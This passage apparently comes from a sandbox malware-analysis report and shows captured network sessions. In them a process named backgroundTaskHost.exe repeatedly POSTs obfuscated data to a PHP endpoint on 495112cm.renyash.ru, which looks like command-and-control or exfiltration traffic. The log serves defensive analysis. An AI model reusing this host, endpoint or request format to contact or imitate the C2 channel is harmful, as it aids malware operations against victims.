                                                                                          Jan 4, 2025 11:08:40.779815912 CET2520OUTData Raw: 54 51 5e 52 55 53 5f 56 5c 5b 52 58 57 5e 58 5a 58 51 5a 5a 52 5c 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ^RUS_V\[RXW^XZXQZZR\QW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)C4;&2##_*!&0=4 %+Z#_(&"=._++!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:40.895785093 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:41.163284063 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nreRDgncnz0i0zQs2grHig03nAbR585PIwZ9c%2BoJ6UWO06UTHMok%2B8ICxYddrE%2BrPKbkj4NEgl9%2BgTsK%2BN4r3hku3qUyt2AnxEZty9hUqZsbItsE7metWoTRUGQ9CToQpW75ibio"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dbf4b300f5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3813&min_rtt=1502&rtt_var=5186&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=73018&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          73192.168.2.450062104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:41.223495007 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:41.576710939 CET1844OUTData Raw: 54 50 5e 52 55 52 5f 54 5c 5b 52 58 57 5d 58 53 58 5d 5a 58 52 50 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^RUR_T\[RXW]XSX]ZXRPQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)#@4%U'0$(/*#=%$= .6V<<+*5##.&Y>;!Y#!Y,
                                                                                          Jan 4, 2025 11:08:41.695189953 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:41.945910931 CET953INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pCwo19ex9qyop5AEZrImg7xmqTwnPY0pL0RP8GXMbyWqyGGU99ih4MFYj%2BH5QckDnPgMnS4diPex51g7DdtxTW9eo34EDpSEawduTB8kmAcxZAM%2F8ui75DgFXaS2KbfibdOqH%2Fu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dc44eef4241-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3849&min_rtt=1688&rtt_var=4955&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=76931&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 28 00 0e 55 21 59 30 11 3e 00 2a 5f 26 0e 0a 5e 2c 31 20 03 20 3c 09 5f 2e 21 26 00 33 23 02 58 29 01 2b 0d 37 1e 2f 1d 24 0a 2a 5d 06 12 38 58 3f 3f 2d 00 25 3b 0f 0f 3d 32 22 40 26 26 0c 10 24 2d 23 59 28 3f 2e 03 25 12 21 1c 2a 06 2d 07 2d 3a 38 47 38 05 37 0e 21 29 21 53 08 13 23 0d 32 31 0d 52 3e 56 3e 02 25 55 3d 58 33 2a 34 0e 29 5e 20 18 33 3d 35 04 2c 22 3f 1e 2b 0a 28 12 2c 2e 0e 15 28 58 33 54 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'(U!Y0>*_&^,1 <_.!&3#X)+7/$*]8X??-%;=2"@&&$-#Y(?.%!*--:8G87!)!S#21R>V>%U=X3*4)^ 3=5,"?+(,.(X3T%<"\ #V=WL0
                                                                                          Jan 4, 2025 11:08:41.945950985 CET953INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pCwo19ex9qyop5AEZrImg7xmqTwnPY0pL0RP8GXMbyWqyGGU99ih4MFYj%2BH5QckDnPgMnS4diPex51g7DdtxTW9eo34EDpSEawduTB8kmAcxZAM%2F8ui75DgFXaS2KbfibdOqH%2Fu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dc44eef4241-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3849&min_rtt=1688&rtt_var=4955&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=76931&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 28 00 0e 55 21 59 30 11 3e 00 2a 5f 26 0e 0a 5e 2c 31 20 03 20 3c 09 5f 2e 21 26 00 33 23 02 58 29 01 2b 0d 37 1e 2f 1d 24 0a 2a 5d 06 12 38 58 3f 3f 2d 00 25 3b 0f 0f 3d 32 22 40 26 26 0c 10 24 2d 23 59 28 3f 2e 03 25 12 21 1c 2a 06 2d 07 2d 3a 38 47 38 05 37 0e 21 29 21 53 08 13 23 0d 32 31 0d 52 3e 56 3e 02 25 55 3d 58 33 2a 34 0e 29 5e 20 18 33 3d 35 04 2c 22 3f 1e 2b 0a 28 12 2c 2e 0e 15 28 58 33 54 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'(U!Y0>*_&^,1 <_.!&3#X)+7/$*]8X??-%;=2"@&&$-#Y(?.%!*--:8G87!)!S#21R>V>%U=X3*4)^ 3=5,"?+(,.(X3T%<"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          74192.168.2.450063104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:41.301974058 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:41.654915094 CET2516OUTData Raw: 51 5a 5b 53 50 5c 5f 56 5c 5b 52 58 57 5a 58 5f 58 57 5a 52 52 51 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[SP\_V\[RXWZX_XWZRRQQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*: ^!W' #=?6!.%$-#Q >>W)/<?&?_4)*;!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:41.945502043 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:41.969863892 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:42.028979063 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AbAo8Q1GoDTIxD3CNv4Yq3zS%2Fc%2Fc5p1w%2BculmQLq3PEdM5ZwiAyFLHAqj67yDGg1Rg6Kr7waQHSLmwvmDoa76hBTQzu37mLO%2BVNpVpjTnN7261OTB8gTuTxCBWvyU6l3MMdcXvCl"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dc4aea07c9f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4198&min_rtt=1894&rtt_var=5319&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=71811&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          75192.168.2.450069104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:42.160449028 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:42.514199018 CET2520OUTData Raw: 54 5f 5e 55 50 5c 5f 53 5c 5b 52 58 57 5b 58 5b 58 57 5a 5a 52 53 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^UP\_S\[RXW[X[XWZZRSQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)3#^!V&3_=/9[!-!03V4>:< <$7-.^)!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:42.614989042 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:42.794662952 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G1QN8Lu300p6P9S7VanamR5lNy7eGGXOquDnqi6qbGGsgo1Ah%2BgkLcLpAvrSz%2BZcE9yvbRXApFWkfxkjIS%2BphbxGnkeiuie90DLcYqbA8%2FE9q5b3RUy2WoPv5sOUh%2FwnLXc5pj7V"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dca088042ca-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4069&min_rtt=2142&rtt_var=4657&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=83148&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          76192.168.2.450075104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:42.930551052 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:43.279841900 CET2520OUTData Raw: 54 5f 5b 50 50 59 5a 57 5c 5b 52 58 57 5b 58 5a 58 50 5a 5f 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[PPYZW\[RXW[XZXPZ_R\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-()#;%%8)?)!!X'=#76R((&<#["++!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:43.384381056 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:43.562819004 CET809INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:43 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxxVhvk%2F%2Bh4BNxj6fmcHgDJHhuOC1z0O7QD%2BcvH2mOJzp3iGbK38ijOEXlsUIpQ4d71HxL932fIAssAysz5Aikrs%2BwGxv62%2B1XZfglhDDhgHErex3lybRTDxRGpmfhhzxhz6cDwJ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dcedaa5c347-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3084&min_rtt=1651&rtt_var=3485&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=111305&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          77192.168.2.450081104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:43.699157000 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:44.045504093 CET2520OUTData Raw: 54 5f 5e 55 50 59 5a 54 5c 5b 52 58 57 53 58 5b 58 56 5a 5b 52 5d 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^UPYZT\[RXWSX[XVZ[R]Q_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=)(78&1U;(/6!60> ><'\+@< !=!Y#!Y,
                                                                                          Jan 4, 2025 11:08:44.142327070 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:44.398593903 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0c9O02DQOTEVkgLRTFN0c7dVGdDgGPYUMYzzf4tSq92NwcreVExCOIWJoKtkescTShzCwyblDNr7p8g%2FWioZPyHH44OA%2FE2vtgxEE%2F7Didt1hJ0aHoKn7c2l9lHim4RQw3UVLo9l"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dd39be918f6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3633&min_rtt=1455&rtt_var=4903&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=77314&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          78192.168.2.450086104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:44.537066936 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:44.889316082 CET2520OUTData Raw: 51 5c 5b 52 50 5b 5a 55 5c 5b 52 58 57 5e 58 58 58 53 5a 52 52 52 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\[RP[ZU\[RXW^XXXSZRRRQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9+@4"20 )]"-*$. .%<8+60">1)!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:44.999789000 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:45.217947006 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:45.259191036 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBxnLeKl09hxf8%2BPtaDUU6WUU3e40bxMQ%2Fvbvk7WqKEUAbSGTG98B8J61Si4ZmVobic4oxoVomsW6SZnE5kvvvTiMnFSwE%2Fnw61hofk6PyE7ZcoAkZXP%2B0MCuJyvopLEEAKxIJzS"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dd8f81c430d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4542&min_rtt=1651&rtt_var=6402&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58913&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          79192.168.2.450087104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:45.398993015 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:45.748621941 CET2516OUTData Raw: 51 5c 5e 52 50 58 5a 55 5c 5b 52 58 57 5a 58 5b 58 57 5a 5d 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^RPXZU\[RXWZX[XWZ]RQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.) 8=T&#>Z*5[%[3>4-:W)/<?&^4=!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:45.864165068 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:46.051177025 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:46 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OQSa%2F0kMn6RCtoQggMHocTFCckf8Yvyv%2FMTVrY9KglmzF4bd4oi40IgdcZeOkDe%2Bvbp9ARPL7J2WSAm86IxLnWOpCH5Kv7zWVFZDZrtNs7sTDsUayqP3PDcz0qN5Gym1%2FJDdlazL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dde5b3442b9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3936&min_rtt=1689&rtt_var=5128&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=74236&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          80192.168.2.450088104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:46.177037954 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:46.529973984 CET2520OUTData Raw: 51 59 5e 52 50 59 5f 54 5c 5b 52 58 57 5f 58 5f 58 53 5a 5c 52 54 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^RPY_T\[RXW_X_XSZ\RTQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E=37!%3 =">3-'#>-(Z0<@ 7..^*!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:46.621053934 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:46.890897036 CET800INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:46 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
